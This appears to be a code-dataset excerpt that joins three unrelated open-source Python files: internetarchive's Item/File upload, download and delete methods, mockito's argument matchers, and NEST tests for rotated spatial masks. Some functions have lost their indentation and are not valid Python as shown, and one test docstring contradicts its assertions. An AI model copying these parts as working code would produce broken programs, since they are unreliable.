            log.warning('Not downloading item {0}, '
                        'item does not exist.'.format(self.identifier))

        if concurrent:
            # gevent is imported lazily so it is only required when
            # concurrent downloads were actually requested.
            try:
                from gevent import monkey
                monkey.patch_socket()
                from gevent.pool import Pool
                pool = Pool()
            except ImportError:
                raise ImportError(
                    """No module named gevent

                Downloading files concurrently requires the gevent neworking library.
                gevent and all of it's dependencies can be installed with pip:

                \tpip install cython git+git://github.com/surfly/gevent.git@1.0rc2#egg=gevent

                """)

        # The last filter given wins: formats overrides source, and
        # glob_pattern overrides both.
        files = self.iter_files()
        if source:
            files = self.get_files(source=source)
        if formats:
            files = self.get_files(formats=formats)
        if glob_pattern:
            files = self.get_files(glob_pattern=glob_pattern)

        if not files and verbose:
            sys.stdout.write(' no matching files found, nothing downloaded.\n')

        for f in files:
            fname = f.name.encode('utf-8')
            if no_directory:
                path = fname
            else:
                path = os.path.join(self.identifier, fname)
            if dry_run:
                # Dry runs only report the URL that would be fetched.
                sys.stdout.write(f.url + '\n')
                continue
            if concurrent:
                pool.spawn(f.download, path, verbose, ignore_existing, checksum, destdir)
            else:
                f.download(path, verbose, ignore_existing, checksum, destdir)
        if concurrent:
            # Block until every spawned download has finished.
            pool.join()
        return True
    # modify_metadata()
    # ____________________________________________________________________________________
    def modify_metadata(self, metadata, target=None, append=False, priority=None,
                        access_key=None, secret_key=None, debug=False):
        """Modify the metadata of an existing item on Archive.org.

        Note: The Metadata Write API does not yet comply with the
        latest Json-Patch standard. It currently complies with `version 02
        <https://tools.ietf.org/html/draft-ietf-appsawg-json-patch-02>`__.

        :type metadata: dict
        :param metadata: Metadata used to update the item.

        :type target: str
        :param target: (optional) Set the metadata target to update.
                       Defaults to ``'metadata'``.

        :type append: bool
        :param append: (optional) Append values to existing metadata
                       rather than replacing them.

        :type priority: int
        :param priority: (optional) Set task priority.

        :type access_key: str
        :param access_key: (optional) IA-S3 access key; falls back to
                           the session's key.

        :type secret_key: str
        :param secret_key: (optional) IA-S3 secret key; falls back to
                           the session's key.

        :type debug: bool
        :param debug: (optional) Return the unprepared request instead
                      of sending it.

        Usage::

            >>> import internetarchive
            >>> item = internetarchive.Item('mapi_test_item1')
            >>> md = dict(new_key='new_value', foo=['bar', 'bar2'])
            >>> item.modify_metadata(md)

        :rtype: dict
        :returns: A dictionary containing the status_code and response
                  returned from the Metadata API.
        """
        access_key = self.session.access_key if not access_key else access_key
        secret_key = self.session.secret_key if not secret_key else secret_key
        target = 'metadata' if target is None else target

        url = '{protocol}//archive.org/metadata/{identifier}'.format(**self.__dict__)
        # The request also needs the current metadata for the target so
        # it can compute a JSON patch against it.
        request = iarequest.MetadataRequest(
            url=url,
            metadata=metadata,
            source_metadata=self._json.get(target.split('/')[0], {}),
            target=target,
            priority=priority,
            access_key=access_key,
            secret_key=secret_key,
            append=append,
        )
        if debug:
            return request
        prepared_request = request.prepare()
        resp = self.http_session.send(prepared_request)
        # Refresh cached metadata so this object reflects the change.
        self._json = self.get_metadata()
        return resp
# s3_is_overloaded()
# ____________________________________________________________________________________
def s3_is_overloaded(self, access_key=None):
u = 'http://s3.us.archive.org'
p = dict(
check_limit=1,
accesskey=access_key,
bucket=self.identifier,
)
r = self.http_session.get(u, params=p)
j = r.json()
if j.get('over_limit') == 0:
return False
else:
return True
    # upload_file()
    # ____________________________________________________________________________________
    def upload_file(self, body, key=None, metadata=None, headers=None,
                    access_key=None, secret_key=None, queue_derive=True,
                    ignore_preexisting_bucket=False, verbose=False, verify=True,
                    checksum=False, delete=False, retries=None, retries_sleep=None,
                    debug=False, **kwargs):
        """Upload a single file to an item. The item will be created
        if it does not exist.

        :type body: Filepath or file-like object.
        :param body: File or data to be uploaded.

        :type key: str
        :param key: (optional) Remote filename.

        :type metadata: dict
        :param metadata: (optional) Metadata used to create a new item.

        :type headers: dict
        :param headers: (optional) Add additional IA-S3 headers to request.

        :type queue_derive: bool
        :param queue_derive: (optional) Set to False to prevent an item from
                             being derived after upload.

        :type ignore_preexisting_bucket: bool
        :param ignore_preexisting_bucket: (optional) Destroy and respecify the
                                          metadata for an item

        :type verify: bool
        :param verify: (optional) Verify local MD5 checksum matches the MD5
                       checksum of the file received by IAS3.

        :type checksum: bool
        :param checksum: (optional) Skip based on checksum.

        :type delete: bool
        :param delete: (optional) Delete local file after the upload has been
                       successfully verified.

        :type retries: int
        :param retries: (optional) Number of times to retry the given request
                        if S3 returns a 503 SlowDown error.

        :type retries_sleep: int
        :param retries_sleep: (optional) Amount of time to sleep between
                              ``retries``.

        :type verbose: bool
        :param verbose: (optional) Print progress to stdout.

        :type debug: bool
        :param debug: (optional) Set to True to print headers to stdout, and
                      exit without sending the upload request.

        Usage::

            >>> import internetarchive
            >>> item = internetarchive.Item('identifier')
            >>> item.upload_file('/path/to/image.jpg',
            ...                  key='photos/image1.jpg')
            True
        """
        # Defaults for empty params.
        headers = {} if headers is None else headers
        metadata = {} if metadata is None else metadata
        access_key = self.session.access_key if access_key is None else access_key
        secret_key = self.session.secret_key if secret_key is None else secret_key
        retries = 0 if retries is None else retries
        retries_sleep = 30 if retries_sleep is None else retries_sleep

        # Accept either a filepath or an already-open file-like object.
        if not hasattr(body, 'read'):
            body = open(body, 'rb')
        if not metadata.get('scanner'):
            scanner = 'Internet Archive Python library {0}'.format(__version__)
            metadata['scanner'] = scanner

        # Determine the upload size by seeking to the end of the stream;
        # unseekable streams get no size hint.
        try:
            body.seek(0, os.SEEK_END)
            size = body.tell()
            body.seek(0, os.SEEK_SET)
        except IOError:
            size = None
        if not headers.get('x-archive-size-hint'):
            headers['x-archive-size-hint'] = size

        key = body.name.split('/')[-1] if key is None else key
        base_url = '{protocol}//s3.us.archive.org/{identifier}'.format(**self.__dict__)
        url = '{base_url}/{key}'.format(base_url=base_url, key=urllib.parse.quote(key))

        # Skip based on checksum: only when no tasks are pending and the
        # remote copy's MD5 already matches the local one.
        md5_sum = utils.get_md5(body)
        ia_file = self.get_file(key)
        if (checksum) and (not self.tasks) and (ia_file) and (ia_file.md5 == md5_sum):
            log.info('{f} already exists: {u}'.format(f=key, u=url))
            if verbose:
                sys.stdout.write(' {f} already exists, skipping.\n'.format(f=key))
            if delete:
                log.info(
                    '{f} successfully uploaded to https://archive.org/download/{i}/{f} '
                    'and verified, deleting '
                    'local copy'.format(i=self.identifier, f=key)
                )
                os.remove(body.name)
            # Return an empty response object if checksums match.
            # TODO: Is there a better way to handle this?
            return Response()

        # require the Content-MD5 header when delete is True.
        if verify or delete:
            headers['Content-MD5'] = md5_sum

        # Delete retries and sleep_retries from kwargs so they are not
        # forwarded to the S3 request below.
        if 'retries' in kwargs:
            del kwargs['retries']
        if 'retries_sleep' in kwargs:
            del kwargs['retries_sleep']

        def _build_request():
            # Rebuild the request from the start of the stream each time
            # so a retried upload re-sends the full body.
            body.seek(0, os.SEEK_SET)
            if verbose:
                try:
                    chunk_size = 1048576
                    expected_size = size/chunk_size + 1
                    chunks = utils.chunk_generator(body, chunk_size)
                    progress_generator = progress.bar(chunks, expected_size=expected_size,
                                                      label=' uploading {f}: '.format(f=key))
                    data = utils.IterableToFileAdapter(progress_generator, size)
                except:
                    # NOTE(review): bare except -- falls back to a plain
                    # upload whenever the progress bar cannot be set up
                    # (e.g. size is None); consider narrowing.
                    sys.stdout.write(' uploading {f}: '.format(f=key))
                    data = body
            else:
                data = body

            request = iarequest.S3Request(
                method='PUT',
                url=url,
                headers=headers,
                data=data,
                metadata=metadata,
                access_key=access_key,
                secret_key=secret_key,
                queue_derive=queue_derive,
                **kwargs
            )
            return request

        if debug:
            return _build_request()
        else:
            try:
                error_msg = ('s3 is overloaded, sleeping for '
                             '{0} seconds and retrying. '
                             '{1} retries left.'.format(retries_sleep, retries))
                while True:
                    # Proactively back off while S3 reports it is
                    # overloaded, consuming one retry per wait.
                    if retries > 0:
                        if self.s3_is_overloaded(access_key):
                            time.sleep(retries_sleep)
                            log.info(error_msg)
                            if verbose:
                                sys.stderr.write(' warning: {0}\n'.format(error_msg))
                            retries -= 1
                            continue
                    request = _build_request()
                    prepared_request = request.prepare()
                    response = self.http_session.send(prepared_request, stream=True)
                    # Retry on 503 SlowDown responses until retries run out.
                    if (response.status_code == 503) and (retries > 0):
                        log.info(error_msg)
                        if verbose:
                            sys.stderr.write(' warning: {0}\n'.format(error_msg))
                        time.sleep(retries_sleep)
                        retries -= 1
                        continue
                    else:
                        if response.status_code == 503:
                            log.info('maximum retries exceeded, upload failed.')
                        break
                response.raise_for_status()
                log.info('uploaded {f} to {u}'.format(f=key, u=url))
                if delete and response.status_code == 200:
                    log.info(
                        '{f} successfully uploaded to '
                        'https://archive.org/download/{i}/{f} and verified, deleting '
                        'local copy'.format(i=self.identifier, f=key)
                    )
                    os.remove(body.name)
                return response
            except HTTPError as exc:
                error_msg = (' error uploading {0} to {1}, '
                             '{2}'.format(key, self.identifier, exc))
                log.error(error_msg)
                if verbose:
                    sys.stderr.write(error_msg + '\n')
                # Raise HTTPError with error message.
                raise type(exc)(error_msg)
    # upload()
    # ____________________________________________________________________________________
    def upload(self, files, **kwargs):
        """Upload files to an item. The item will be created if it
        does not exist.

        :type files: list
        :param files: The filepaths or file-like objects to upload.
                      Directories are walked recursively; a dict maps
                      remote keys to bodies.

        :type kwargs: dict
        :param kwargs: The keyword arguments from the call to
                       upload_file().

        Usage::

            >>> import internetarchive
            >>> item = internetarchive.Item('identifier')
            >>> md = dict(mediatype='image', creator='Jake Johnson')
            >>> item.upload('/path/to/image.jpg', metadata=md, queue_derive=False)
            True

        :rtype: bool
        :returns: True if the request was successful and all files were
                  uploaded, False otherwise.
        """
        def iter_directory(directory):
            # Yield (filepath, key) pairs for every file below directory.
            for path, dir, files in os.walk(directory):
                for f in files:
                    filepath = os.path.join(path, f)
                    key = os.path.relpath(filepath, directory)
                    yield (filepath, key)

        if isinstance(files, dict):
            files = files.items()
        if not isinstance(files, (list, tuple)):
            files = [files]

        queue_derive = kwargs.get('queue_derive', True)
        responses = []

        file_index = 0
        for f in files:
            file_index += 1
            if isinstance(f, six.string_types) and os.path.isdir(f):
                fdir_index = 0
                for filepath, key in iter_directory(f):
                    # Set derive header if queue_derive is True,
                    # and this is the last request being made.
                    # NOTE(review): os.listdir() is non-recursive while
                    # iter_directory() walks recursively, so the counts
                    # can disagree for nested directories -- confirm the
                    # derive trigger still fires in that case.
                    fdir_index += 1
                    if queue_derive is True and file_index >= len(files) \
                            and fdir_index >= len(os.listdir(f)):
                        kwargs['queue_derive'] = True
                    else:
                        kwargs['queue_derive'] = False

                    if not f.endswith('/'):
                        key = '{0}/{1}'.format(f, key)
                    resp = self.upload_file(filepath, key=key, **kwargs)
                    responses.append(resp)
            else:
                # Set derive header if queue_derive is True,
                # and this is the last request being made.
                if queue_derive is True and file_index >= len(files):
                    kwargs['queue_derive'] = True
                else:
                    kwargs['queue_derive'] = False

                # A bare body gets its key derived later; a (key, body)
                # pair is unpacked here.
                if not isinstance(f, (list, tuple)):
                    key, body = (None, f)
                else:
                    key, body = f
                if key and not isinstance(key, six.string_types):
                    raise ValueError('Key must be a string.')

                resp = self.upload_file(body, key=key, **kwargs)
                responses.append(resp)
        return responses
# File class
# ________________________________________________________________________________________
class File(object):
    """This class represents a file in an archive.org item. You
    can use this class to access the file metadata::

        >>> import internetarchive
        >>> item = internetarchive.Item('stairs')
        >>> file = internetarchive.File(item, 'stairs.avi')
        >>> print(f.format, f.size)
        (u'Cinepack', u'3786730')

    Or to download a file::

        >>> file.download()
        >>> file.download('fabulous_movie_of_stairs.avi')

    This class also uses IA's S3-like interface to delete a file
    from an item. You need to supply your IAS3 credentials in
    environment variables in order to delete::

        >>> file.delete(access_key='Y6oUrAcCEs4sK8ey',
        ...             secret_key='youRSECRETKEYzZzZ')

    You can retrieve S3 keys here: `https://archive.org/account/s3.php
    <https://archive.org/account/s3.php>`__

    """

    # init()
    # ____________________________________________________________________________________
    def __init__(self, item, name):
        """
        :type item: Item
        :param item: The item that the file is part of.

        :type name: str
        :param name: The filename of the file.
        """
        # Locate this file's entry in the item's file list; unknown
        # names fall through with empty metadata.
        _file = {}
        for f in item.files:
            if f.get('name') == name:
                _file = f
                break

        self._item = item
        self.identifier = item.identifier
        # Default attributes, overwritten below by the file's metadata.
        self.name = None
        self.size = None
        self.source = None
        self.format = None
        self.md5 = None
        self.mtime = None

        for key in _file:
            setattr(self, key, _file[key])

        # Normalize types: the Files API returns these as strings.
        self.mtime = float(self.mtime) if self.mtime else 0
        self.size = int(self.size) if self.size else 0

        base_url = '{protocol}//archive.org/download/{identifier}'.format(**item.__dict__)
        self.url = '{base_url}/{name}'.format(base_url=base_url,
                                              name=urllib.parse.quote(name.encode('utf-8')))
# __repr__()
# ____________________________________________________________________________________
def __repr__(self):
return ('File(identifier={identifier!r}, '
'filename={name!r}, '
'size={size!r}, '
'source={source!r}, '
'format={format!r})'.format(**self.__dict__))
    # download()
    # ____________________________________________________________________________________
    def download(self, file_path=None, verbose=None, ignore_existing=None, checksum=None,
                 destdir=None):
        """Download the file into the current working directory.

        :type file_path: str
        :param file_path: Download file to the given file_path.

        :type verbose: bool
        :param verbose: (optional) Print actions to stdout.

        :type ignore_existing: bool
        :param ignore_existing: Overwrite local files if they already
                                exist.

        :type checksum: bool
        :param checksum: Skip downloading file based on checksum.

        :type destdir: str
        :param destdir: (optional) Directory to download the file into.

        :raises IOError: If ``destdir`` is a file, or the target file
                         already exists and no skip option was given.
        :raises HTTPError: If the download request fails.
        """
        verbose = False if verbose is None else verbose
        ignore_existing = False if ignore_existing is None else ignore_existing
        checksum = False if checksum is None else checksum

        file_path = self.name if not file_path else file_path

        if destdir:
            if not os.path.exists(destdir):
                os.mkdir(destdir)
            if os.path.isfile(destdir):
                raise IOError('{} is not a directory!'.format(destdir))
            file_path = os.path.join(destdir, file_path)

        # Skip based on mtime and length if no other clobber/skip options specified.
        if os.path.exists(file_path) and ignore_existing is False and checksum is False:
            st = os.stat(file_path)
            # _files.xml is regenerated server-side, so any non-empty
            # local copy counts as up to date.
            if (st.st_mtime == self.mtime) and (st.st_size == self.size) \
                    or self.name.endswith('_files.xml') and st.st_size != 0:
                if verbose:
                    print(' skipping {0}: already exists.'.format(file_path))
                log.info('not downloading file {0}, '
                         'file already exists.'.format(file_path))
                return

        if os.path.exists(file_path):
            if ignore_existing is False and checksum is False:
                raise IOError('file already downloaded: {0}'.format(file_path))
            if checksum:
                md5_sum = utils.get_md5(open(file_path))
                if md5_sum == self.md5:
                    log.info('not downloading file {0}, '
                             'file already exists based on checksum.'.format(file_path))
                    if verbose:
                        sys.stdout.write(' skipping {0}: already exists based on checksum.\n'.format(file_path))
                    return

        if verbose:
            sys.stdout.write(' downloading: {0}\n'.format(file_path))

        # Create any intermediate directories the target path needs.
        parent_dir = os.path.dirname(file_path)
        if parent_dir != '' and not os.path.exists(parent_dir):
            os.makedirs(parent_dir)

        try:
            response = self._item.http_session.get(self.url, stream=True)
            response.raise_for_status()
        except HTTPError as e:
            raise HTTPError('error downloading {0}, {1}'.format(self.url, e))

        # Stream the response to disk in 1 KiB chunks.
        with open(file_path, 'wb') as f:
            for chunk in response.iter_content(chunk_size=1024):
                if chunk:
                    f.write(chunk)
                    f.flush()

        # Set mtime with mtime from files.xml.
        os.utime(file_path, (0, self.mtime))
        log.info('downloaded {0}/{1} to {2}'.format(self.identifier,
                                                    self.name.encode('utf-8'),
                                                    file_path))
    # delete()
    # ____________________________________________________________________________________
    def delete(self, debug=False, verbose=False, cascade_delete=False, access_key=None,
               secret_key=None):
        """Delete a file from the Archive. Note: Some files -- such as
        <itemname>_meta.xml -- cannot be deleted.

        :type debug: bool
        :param debug: Set to True to print headers to stdout and exit
                      exit without sending the delete request.

        :type verbose: bool
        :param verbose: Print actions to stdout.

        :type cascade_delete: bool
        :param cascade_delete: Also deletes files derived from the file,
                               and files the file was derived from.

        :type access_key: str
        :param access_key: (optional) IA-S3 access key; falls back to
                           the session's key.

        :type secret_key: str
        :param secret_key: (optional) IA-S3 secret key; falls back to
                           the session's key.
        """
        url = 'http://s3.us.archive.org/{0}/{1}'.format(self.identifier,
                                                        self.name.encode('utf-8'))
        access_key = self._item.session.access_key if not access_key else access_key
        secret_key = self._item.session.secret_key if not secret_key else secret_key
        request = iarequest.S3Request(
            method='DELETE',
            url=url,
            # The S3 endpoint expects 0/1 rather than a boolean.
            headers={'x-archive-cascade-delete': int(cascade_delete)},
            access_key=access_key,
            secret_key=secret_key
        )
        if debug:
            return request
        else:
            if verbose:
                msg = ' deleting: {0}'.format(self.name.encode('utf-8'))
                if cascade_delete:
                    msg += ' and all derivative files.\n'
                else:
                    msg += '\n'
                sys.stdout.write(msg)
            prepared_request = request.prepare()
            return self._item.http_session.send(prepared_request)
| agpl-3.0 |
mriehl/mockito-without-hardcoded-distribute-version | mockito-0.5.2/mockito/matchers.py | 3 | 2261 | # Copyright (c) 2008-2013 Szczepan Faber, Serhiy Oplakanets, Herr Kaste
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
'''Matchers for stubbing and verifications.
Common matchers for use in stubbing and verifications.
'''
__all__ = ['any', 'contains', 'times']
class Matcher:
    """Base class for all argument matchers."""

    def matches(self, arg):
        """Return a truthy value when *arg* satisfies this matcher.

        The base implementation matches nothing (returns None).
        """
        return None
class Any(Matcher):
    """Matches any value, optionally restricted to a given type."""

    def __init__(self, wanted_type=None):
        self.wanted_type = wanted_type

    def matches(self, arg):
        # With no (truthy) type restriction, everything matches.
        return isinstance(arg, self.wanted_type) if self.wanted_type else True

    def __repr__(self):
        return "<Any: %s>" % self.wanted_type
class Contains(Matcher):
    """Matches string-like arguments containing a given substring."""

    def __init__(self, sub):
        self.sub = sub

    def matches(self, arg):
        # Arguments without a .find() method (non string-like) never
        # match; falls through returning None.
        if not hasattr(arg, 'find'):
            return
        # NOTE: short-circuiting returns ``self.sub`` itself when it is
        # falsy (None or ''), rather than a boolean.
        return self.sub and len(self.sub) > 0 and arg.find(self.sub) > -1

    def __repr__(self):
        return "<Contains: '%s'>" % self.sub
def any(wanted_type=None):
    """Matches any() argument OR any(SomeClass) argument

    Examples:
        when(mock).foo(any()).thenReturn(1)
        verify(mock).foo(any(int))

    NOTE: intentionally shadows the builtin ``any`` when star-imported
    from this module.
    """
    return Any(wanted_type)
def contains(sub):
    """Matches any string-like argument containing the substring *sub*."""
    return Contains(sub)
def times(count):
    """Return *count* unchanged; exists so calls read as
    ``verify(mock, times(2))``."""
    return count
| mit |
alberto-antonietti/nest-simulator | pynest/nest/tests/test_spatial/test_rotated_rect_mask.py | 20 | 16421 | # -*- coding: utf-8 -*-
#
# test_rotated_rect_mask.py
#
# This file is part of NEST.
#
# Copyright (C) 2004 The NEST Initiative
#
# NEST is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# NEST is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NEST. If not, see <http://www.gnu.org/licenses/>.
"""
Tests rotated rectangular and box masks.
"""
import unittest
import nest
class RotatedRectangularMask(unittest.TestCase):
    """Tests for rotated rectangular (2D) and box (3D) masks."""

    def setUp(self):
        # Start every test from a pristine kernel so layers and masks do
        # not leak between test cases.
        nest.ResetKernel()
    def test_RotatedRectangularMask(self):
        """Test rotated rectangular mask.

        We have:
            lower_left: [-1., -0.5]
            upper_right: [ 1., 0.5]

        So, if we have:

        layer:
        2  7  12  17  22
        3  8  13  18  23
        4  9  14  19  24
        5  10 15  20  25
        6  11 16  21  26

        and have azimuth_angle = 0, we should get node IDs 9, 14, 19 if we
        select node IDs by mask.
        If we have azimuth_angle = 90, we should get node IDs 13, 14, 15.

        NOTE(review): the IDs quoted above (9, 14, 19 / 13, 14, 15) do
        not match the IDs actually asserted below (8, 13, 18 / 12, 13,
        14); the diagram or the example IDs appear to be off by one row
        -- confirm and update.
        """
        # Test 2D layer
        layer = nest.Create('iaf_psc_alpha',
                            positions=nest.spatial.grid(shape=[5, 5],
                                                        extent=[5., 5.]))

        # First test without rotation.
        maskdict = {'lower_left': [-1., -0.5], 'upper_right': [1., 0.5]}
        mask = nest.CreateMask('rectangular', maskdict)
        cntr = [0., 0.]
        node_ids = nest.SelectNodesByMask(layer, cntr, mask)
        self.assertEqual(node_ids, nest.NodeCollection((8, 13, 18,)))

        # Test if we get correct node IDs when rotating 90 degrees.
        maskdict = {'lower_left': [-1., -0.5],
                    'upper_right': [1., 0.5],
                    'azimuth_angle': 90.0}
        mask = nest.CreateMask('rectangular', maskdict)
        node_ids = nest.SelectNodesByMask(layer, cntr, mask)
        self.assertEqual(node_ids, nest.NodeCollection((12, 13, 14,)))

        # Test rotation with an azimuth angle of 45 degrees.
        maskdict = {'lower_left': [-1.5, -0.5],
                    'upper_right': [1.5, 0.5],
                    'azimuth_angle': 45.0}
        mask = nest.CreateMask('rectangular', maskdict)
        node_ids = nest.SelectNodesByMask(layer, cntr, mask)
        self.assertEqual(node_ids, nest.NodeCollection((9, 13, 17,)))

        # Test rotation with an azimuth angle of 135 degrees.
        maskdict = {'lower_left': [-1.5, -0.5],
                    'upper_right': [1.5, 0.5],
                    'azimuth_angle': 135.0}
        mask = nest.CreateMask('rectangular', maskdict)
        node_ids = nest.SelectNodesByMask(layer, cntr, mask)
        self.assertEqual(node_ids, nest.NodeCollection((7, 13, 19,)))

        # Test that an error is raised if we send in a polar angle to a 2D
        # mask.
        maskdict = {'lower_left': [-1.5, -0.5],
                    'upper_right': [1.5, 0.5],
                    'polar_angle': 45.0}
        with self.assertRaises(nest.kernel.NESTError):
            mask = nest.CreateMask('rectangular', maskdict)
    def test_RotatedBoxMaskByAzimuthAngle(self):
        """Test rotated box mask with azimuth angle."""
        # Test a 3D layer: a 5x5x5 free grid of positions in [-2, 2]^3.
        pos = [[x * 1., y * 1., z * 1.] for x in range(-2, 3)
               for y in range(-2, 3)
               for z in range(-2, 3)]
        layer = nest.Create('iaf_psc_alpha', positions=nest.spatial.free(pos))

        # First test that we get correct node IDs with box mask that is not
        # rotated.
        maskdict = {'lower_left': [-1., -0.5, -0.5],
                    'upper_right': [1., 0.5, 0.5]}
        mask = nest.CreateMask('box', maskdict)
        cntr = [0., 0., 0.]
        node_ids = nest.SelectNodesByMask(layer, cntr, mask)
        self.assertEqual(node_ids, nest.NodeCollection((38, 63, 88,)))

        # Test with a larger box mask.
        maskdict = {'lower_left': [-1., -0.5, -1.],
                    'upper_right': [1., 0.5, 1.]}
        mask = nest.CreateMask('box', maskdict)
        node_ids = nest.SelectNodesByMask(layer, cntr, mask)
        self.assertEqual(node_ids, nest.NodeCollection([37, 38, 39, 62, 63, 64, 87, 88, 89]))

        # Test the smaller box mask with a rotation of 90 degrees. Only test
        # the azimuth angle, not the polar angle.
        maskdict = {'lower_left': [-1., -0.5, -0.5],
                    'upper_right': [1., 0.5, 0.5],
                    'azimuth_angle': 90.}
        mask = nest.CreateMask('box', maskdict)
        node_ids = nest.SelectNodesByMask(layer, cntr, mask)
        self.assertEqual(node_ids, nest.NodeCollection((58, 63, 68,)))

        # Test rotation of the larger box with an azimuth angle of 90 degrees.
        maskdict = {'lower_left': [-1., -0.5, -1.],
                    'upper_right': [1., 0.5, 1.],
                    'azimuth_angle': 90.}
        mask = nest.CreateMask('box', maskdict)
        node_ids = nest.SelectNodesByMask(layer, cntr, mask)
        self.assertEqual(node_ids, nest.NodeCollection([57, 58, 59, 62, 63, 64, 67, 68, 69]))
    def test_RotatedBoxMaskByPolarAngle(self):
        """Test rotated box mask with polar angle."""
        # 5x5x5 free grid of positions in [-2, 2]^3.
        pos = [[x * 1., y * 1., z * 1.] for x in range(-2, 3)
               for y in range(-2, 3)
               for z in range(-2, 3)]
        layer = nest.Create('iaf_psc_alpha', positions=nest.spatial.free(pos))

        # First test without rotation
        maskdict = {'lower_left': [-0.5, -1.0, -1.0],
                    'upper_right': [0.5, 1.0, 1.0]}
        mask = nest.CreateMask('box', maskdict)
        cntr = [0., 0., 0.]
        node_ids = nest.SelectNodesByMask(layer, cntr, mask)
        self.assertEqual(node_ids, nest.NodeCollection([57, 58, 59, 62, 63, 64, 67, 68, 69]))

        # Test with a polar angle of 90 degrees.
        maskdict = {'lower_left': [-0.5, -1.0, -1.0],
                    'upper_right': [0.5, 1.0, 1.0],
                    'polar_angle': 90.}
        mask = nest.CreateMask('box', maskdict)
        node_ids = nest.SelectNodesByMask(layer, cntr, mask)
        self.assertEqual(node_ids, nest.NodeCollection([33, 38, 43, 58, 63, 68, 83, 88, 93]))

        # Test with a polar angle of 180 degrees, should be the same as the
        # one without a polar angle.
        maskdict = {'lower_left': [-0.5, -1.0, -1.0],
                    'upper_right': [0.5, 1.0, 1.0],
                    'polar_angle': 180.}
        mask = nest.CreateMask('box', maskdict)
        node_ids = nest.SelectNodesByMask(layer, cntr, mask)
        self.assertEqual(node_ids, nest.NodeCollection([57, 58, 59, 62, 63, 64, 67, 68, 69]))

        # Test with a polar angle of 45 degrees.
        maskdict = {'lower_left': [-0.5, -1.5, -1.5],
                    'upper_right': [0.5, 1.5, 1.5],
                    'polar_angle': 45.}
        mask = nest.CreateMask('box', maskdict)
        node_ids = nest.SelectNodesByMask(layer, cntr, mask)
        self.assertEqual(node_ids, nest.NodeCollection([32, 37, 42, 58, 63, 68, 84, 89, 94]))

        # Test with a polar angle of 135 degrees. The node IDs should be
        # perpendicular to the ones obtained by a polar angle of 45 degrees.
        maskdict = {'lower_left': [-0.5, -1.5, -1.5],
                    'upper_right': [0.5, 1.5, 1.5],
                    'polar_angle': 135.}
        mask = nest.CreateMask('box', maskdict)
        node_ids = nest.SelectNodesByMask(layer, cntr, mask)
        self.assertEqual(node_ids, nest.NodeCollection([34, 39, 44, 58, 63, 68, 82, 87, 92]))

        # Test two symmetric masks in x and z direction. One with no polar
        # angle and one with a polar angle of 90 degrees. As the masks are
        # symmetrical in x and z, a polar angle of 90 degrees should give the
        # same node IDs as the one without a polar angle.
        maskdict = {'lower_left': [-1., -0.5, -1.],
                    'upper_right': [1., 0.5, 1.]}
        mask = nest.CreateMask('box', maskdict)
        node_ids_2 = nest.SelectNodesByMask(layer, cntr, mask)
        self.assertEqual(node_ids_2, nest.NodeCollection([37, 38, 39, 62, 63, 64, 87, 88, 89]))

        maskdict = {'lower_left': [-1., -0.5, -1.],
                    'upper_right': [1., 0.5, 1.],
                    'polar_angle': 90.}
        mask = nest.CreateMask('box', maskdict)
        node_ids = nest.SelectNodesByMask(layer, cntr, mask)
        self.assertEqual(node_ids, nest.NodeCollection([37, 38, 39, 62, 63, 64, 87, 88, 89]))
        self.assertEqual(node_ids_2, node_ids)
def test_RotatedBoxMaskByAzimuthAndPolarAngle(self):
"""Test rotated box mask with azimuth and polar angle."""
# 5x5x5 free layer of neurons on the integer lattice [-2, 2]^3.
pos = [[x * 1., y * 1., z * 1.] for x in range(-2, 3)
for y in range(-2, 3)
for z in range(-2, 3)]
layer = nest.Create('iaf_psc_alpha', positions=nest.spatial.free(pos))
# Test with a azimuth angle and polar angle of 45 degrees.
maskdict = {'lower_left': [-0.5, -1.5, -1.5],
'upper_right': [0.5, 1.5, 1.5],
'azimuth_angle': 45.,
'polar_angle': 45.}
mask = nest.CreateMask('box', maskdict)
# Anchor the mask at the origin and check the exact set of node IDs
# selected by the doubly rotated box.
cntr = [0., 0., 0.]
node_ids = nest.SelectNodesByMask(layer, cntr, mask)
self.assertEqual(node_ids, nest.NodeCollection([37, 38, 43, 57, 58, 63, 68, 69, 83, 88, 89]))
def test_RotatedRectangleOutsideOrigin(self):
"""
Test rotated rectangle where the mask does not contain the origin.
"""
# 11x11 grid layer with unit spacing; the mask is anchored at the
# origin but its extent lies entirely in the first quadrant.
layer = nest.Create('iaf_psc_alpha',
positions=nest.spatial.grid(shape=[11, 11],
extent=[11., 11.]))
# First test that we get the correct node IDs when our mask does not
# contain the origin.
maskdict = {'lower_left': [1., 1.], 'upper_right': [4., 2.]}
mask = nest.CreateMask('rectangular', maskdict)
cntr = [0., 0.]
node_ids = nest.SelectNodesByMask(layer, cntr, mask)
self.assertEqual(node_ids, nest.NodeCollection((70, 71, 81, 82, 92, 93, 103, 104,)))
# Then test that we get the correct node IDs with a azimuth rotation angle
# of 45 degrees when the mask does not contain the origin.
maskdict = {'lower_left': [0.5, 0.5],
'upper_right': [4.5, 2.5],
'azimuth_angle': 45.0}
mask = nest.CreateMask('rectangular', maskdict)
node_ids = nest.SelectNodesByMask(layer, cntr, mask)
self.assertEqual(node_ids, nest.NodeCollection((71, 81, 82, 83, 91, 92, 93, 103,)))
